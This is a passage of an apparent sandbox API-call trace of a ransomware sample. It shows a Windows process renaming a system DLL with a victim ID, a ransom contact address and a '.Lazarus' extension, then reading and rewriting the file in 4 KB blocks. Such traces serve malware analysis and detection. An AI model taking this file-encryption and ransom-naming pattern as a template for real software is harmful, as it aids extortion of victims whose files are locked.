lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0060.049] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8)) returned 1 [0060.049] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0060.049] AreFileApisANSI () returned 1 [0060.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0060.049] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0060.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.050] GetLastError () returned 0x0 [0060.050] SetLastError (dwErrCode=0x0) [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e180 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x30fc0 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0060.050] GetLastError () returned 0x0 [0060.050] SetLastError (dwErrCode=0x0) [0060.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0060.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0060.050] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.050] AreFileApisANSI () returned 1 [0060.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 103 [0060.050] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xce) returned 0x74280 [0060.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x74280, cchWideChar=103 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 103 [0060.050] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.051] GetFileType (hFile=0x41c) returned 0x1 [0060.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74280 | out: hHeap=0x20000) returned 1 [0060.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0060.051] AreFileApisANSI () returned 1 [0060.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0060.051] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67900 [0060.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll") returned 41 [0060.051] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentOOBE.dll" (normalized: "c:\\$getcurrent\\safeos\\getcurrentoobe.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.051] GetFileType (hFile=0x424) returned 0x1 [0060.051] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0060.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a4b0 [0060.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.052] GetLastError () returned 0x0 [0060.052] SetLastError (dwErrCode=0x0) [0060.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.052] GetLastError () returned 0x0 [0060.052] SetLastError (dwErrCode=0x0) [0060.052] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.052] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8a210 [0060.052] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0060.055] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0060.056] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8b218 [0060.056] GetLastError () returned 0x0 [0060.056] SetLastError (dwErrCode=0x0) [0060.056] GetLastError () returned 0x0 [0060.056] SetLastError (dwErrCode=0x0) [0060.056] GetLastError () returned 0x0 [0060.056] SetLastError (dwErrCode=0x0) [0060.056] GetLastError () returned 0x0 [0060.056] SetLastError (dwErrCode=0x0) [0060.057] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.057] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.059] GetLastError () returned 0x0 [0060.059] SetLastError (dwErrCode=0x0) [0060.059] GetLastError () returned 0x0 [0060.059] SetLastError (dwErrCode=0x0) [0060.059] GetLastError () returned 0x0 [0060.059] SetLastError (dwErrCode=0x0) [0060.059] GetLastError () returned 0x0 [0060.059] SetLastError (dwErrCode=0x0) [0060.059] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.059] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.060] GetLastError () returned 0x0 [0060.060] SetLastError (dwErrCode=0x0) [0060.060] GetLastError () returned 0x0 [0060.060] SetLastError (dwErrCode=0x0) [0060.060] GetLastError () returned 0x0 [0060.060] SetLastError (dwErrCode=0x0) [0060.060] GetLastError () returned 0x0 [0060.060] SetLastError (dwErrCode=0x0) [0060.060] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.060] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.061] GetLastError () returned 0x0 [0060.061] SetLastError (dwErrCode=0x0) [0060.061] GetLastError () returned 0x0 [0060.061] SetLastError (dwErrCode=0x0) [0060.061] GetLastError () returned 0x0 [0060.061] SetLastError (dwErrCode=0x0) [0060.061] GetLastError () returned 0x0 [0060.061] SetLastError (dwErrCode=0x0) [0060.061] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.061] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.062] GetLastError () returned 0x0 [0060.062] SetLastError (dwErrCode=0x0) [0060.062] GetLastError () returned 0x0 [0060.062] SetLastError (dwErrCode=0x0) [0060.062] GetLastError () returned 0x0 [0060.062] SetLastError (dwErrCode=0x0) [0060.062] GetLastError () returned 0x0 [0060.062] SetLastError (dwErrCode=0x0) [0060.062] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.062] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.062] GetLastError () returned 0x0 [0060.063] SetLastError (dwErrCode=0x0) [0060.063] GetLastError () returned 0x0 [0060.063] SetLastError (dwErrCode=0x0) [0060.063] GetLastError () returned 0x0 [0060.063] SetLastError (dwErrCode=0x0) [0060.063] GetLastError () returned 0x0 [0060.063] SetLastError (dwErrCode=0x0) [0060.063] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.063] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.063] GetLastError () returned 0x0 [0060.063] SetLastError (dwErrCode=0x0) [0060.063] GetLastError () returned 0x0 [0060.064] SetLastError (dwErrCode=0x0) [0060.064] GetLastError () returned 0x0 [0060.064] SetLastError (dwErrCode=0x0) [0060.064] GetLastError () returned 0x0 [0060.064] SetLastError (dwErrCode=0x0) [0060.064] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.064] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.064] GetLastError () returned 0x0 [0060.064] SetLastError (dwErrCode=0x0) [0060.064] GetLastError () returned 0x0 [0060.064] SetLastError (dwErrCode=0x0) [0060.065] GetLastError () returned 0x0 [0060.065] SetLastError (dwErrCode=0x0) [0060.065] GetLastError () returned 0x0 [0060.065] SetLastError (dwErrCode=0x0) [0060.065] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.065] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.065] GetLastError () returned 0x0 [0060.065] SetLastError (dwErrCode=0x0) [0060.065] GetLastError () returned 0x0 [0060.065] SetLastError (dwErrCode=0x0) [0060.065] GetLastError () returned 0x0 [0060.065] SetLastError (dwErrCode=0x0) [0060.066] GetLastError () returned 0x0 [0060.066] SetLastError (dwErrCode=0x0) [0060.066] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.066] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.066] GetLastError () returned 0x0 [0060.066] SetLastError (dwErrCode=0x0) [0060.066] GetLastError () returned 0x0 [0060.066] SetLastError (dwErrCode=0x0) [0060.066] GetLastError () returned 0x0 [0060.066] SetLastError (dwErrCode=0x0) [0060.066] GetLastError () returned 0x0 [0060.066] SetLastError (dwErrCode=0x0) [0060.067] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.067] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.067] GetLastError () returned 0x0 [0060.067] SetLastError (dwErrCode=0x0) [0060.067] GetLastError () returned 0x0 [0060.068] SetLastError (dwErrCode=0x0) [0060.069] GetLastError () returned 0x0 [0060.069] SetLastError (dwErrCode=0x0) [0060.069] GetLastError () returned 0x0 [0060.069] SetLastError (dwErrCode=0x0) [0060.069] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.069] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.069] GetLastError () returned 0x0 [0060.069] SetLastError (dwErrCode=0x0) [0060.069] GetLastError () returned 0x0 [0060.069] SetLastError (dwErrCode=0x0) [0060.069] GetLastError () returned 0x0 [0060.070] SetLastError (dwErrCode=0x0) [0060.070] GetLastError () returned 0x0 [0060.070] SetLastError (dwErrCode=0x0) [0060.070] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.070] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.070] GetLastError () returned 0x0 [0060.070] SetLastError (dwErrCode=0x0) [0060.070] GetLastError () returned 0x0 [0060.070] SetLastError (dwErrCode=0x0) [0060.070] GetLastError () returned 0x0 [0060.070] SetLastError (dwErrCode=0x0) [0060.071] GetLastError () returned 0x0 [0060.071] SetLastError (dwErrCode=0x0) [0060.071] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.071] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.071] GetLastError () returned 0x0 [0060.071] SetLastError (dwErrCode=0x0) [0060.071] GetLastError () returned 0x0 [0060.071] SetLastError (dwErrCode=0x0) [0060.071] GetLastError () returned 0x0 [0060.071] SetLastError (dwErrCode=0x0) [0060.071] GetLastError () returned 0x0 [0060.071] SetLastError (dwErrCode=0x0) [0060.072] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.072] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.072] GetLastError () returned 0x0 [0060.072] SetLastError (dwErrCode=0x0) [0060.072] GetLastError () returned 0x0 [0060.072] SetLastError (dwErrCode=0x0) [0060.072] GetLastError () returned 0x0 [0060.072] SetLastError (dwErrCode=0x0) [0060.073] GetLastError () returned 0x0 [0060.073] SetLastError (dwErrCode=0x0) [0060.073] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.073] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.073] GetLastError () returned 0x0 [0060.073] SetLastError (dwErrCode=0x0) [0060.073] GetLastError () returned 0x0 [0060.073] SetLastError (dwErrCode=0x0) [0060.073] GetLastError () returned 0x0 [0060.073] SetLastError (dwErrCode=0x0) [0060.073] GetLastError () returned 0x0 [0060.074] SetLastError (dwErrCode=0x0) [0060.074] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.074] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.074] GetLastError () returned 0x0 [0060.074] SetLastError (dwErrCode=0x0) [0060.074] GetLastError () returned 0x0 [0060.074] SetLastError (dwErrCode=0x0) [0060.074] GetLastError () returned 0x0 [0060.074] SetLastError (dwErrCode=0x0) [0060.074] GetLastError () returned 0x0 [0060.074] SetLastError (dwErrCode=0x0) [0060.074] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.075] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.075] GetLastError () returned 0x0 [0060.075] SetLastError (dwErrCode=0x0) [0060.075] GetLastError () returned 0x0 [0060.075] SetLastError (dwErrCode=0x0) [0060.075] GetLastError () returned 0x0 [0060.075] SetLastError (dwErrCode=0x0) [0060.075] GetLastError () returned 0x0 [0060.075] SetLastError (dwErrCode=0x0) [0060.075] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.076] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.076] GetLastError () returned 0x0 [0060.076] SetLastError (dwErrCode=0x0) [0060.076] GetLastError () returned 0x0 [0060.076] SetLastError (dwErrCode=0x0) [0060.076] GetLastError () returned 0x0 [0060.076] SetLastError (dwErrCode=0x0) [0060.076] GetLastError () returned 0x0 [0060.076] SetLastError (dwErrCode=0x0) [0060.076] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.076] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.077] GetLastError () returned 0x0 [0060.077] SetLastError (dwErrCode=0x0) [0060.077] GetLastError () returned 0x0 [0060.077] SetLastError (dwErrCode=0x0) [0060.077] GetLastError () returned 0x0 [0060.077] SetLastError (dwErrCode=0x0) [0060.077] GetLastError () returned 0x0 [0060.077] SetLastError (dwErrCode=0x0) [0060.077] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.077] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.078] GetLastError () returned 0x0 [0060.078] SetLastError (dwErrCode=0x0) [0060.078] GetLastError () returned 0x0 [0060.078] SetLastError (dwErrCode=0x0) [0060.078] GetLastError () returned 0x0 [0060.078] SetLastError (dwErrCode=0x0) [0060.078] GetLastError () returned 0x0 [0060.078] SetLastError (dwErrCode=0x0) [0060.078] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.078] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.078] GetLastError () returned 0x0 [0060.078] SetLastError (dwErrCode=0x0) [0060.079] GetLastError () returned 0x0 [0060.079] SetLastError (dwErrCode=0x0) [0060.079] GetLastError () returned 0x0 [0060.079] SetLastError (dwErrCode=0x0) [0060.079] GetLastError () returned 0x0 [0060.079] SetLastError (dwErrCode=0x0) [0060.079] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.079] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.079] GetLastError () returned 0x0 [0060.079] SetLastError (dwErrCode=0x0) [0060.079] GetLastError () returned 0x0 [0060.079] SetLastError (dwErrCode=0x0) [0060.080] GetLastError () returned 0x0 [0060.080] SetLastError (dwErrCode=0x0) [0060.080] GetLastError () returned 0x0 [0060.080] SetLastError (dwErrCode=0x0) [0060.080] ReadFile (in: hFile=0x424, lpBuffer=0x8a210, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8a210*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0060.081] WriteFile (in: hFile=0x41c, lpBuffer=0x8b218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8b218*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0060.081] GetLastError () returned 0x0 [0060.081] SetLastError (dwErrCode=0x0) [0060.081] GetLastError () returned 0x0 [0060.081] SetLastError (dwErrCode=0x0) [0060.081] GetLastError () returned 0x0 [0060.081] SetLastError (dwErrCode=0x0) [0060.081] GetLastError () 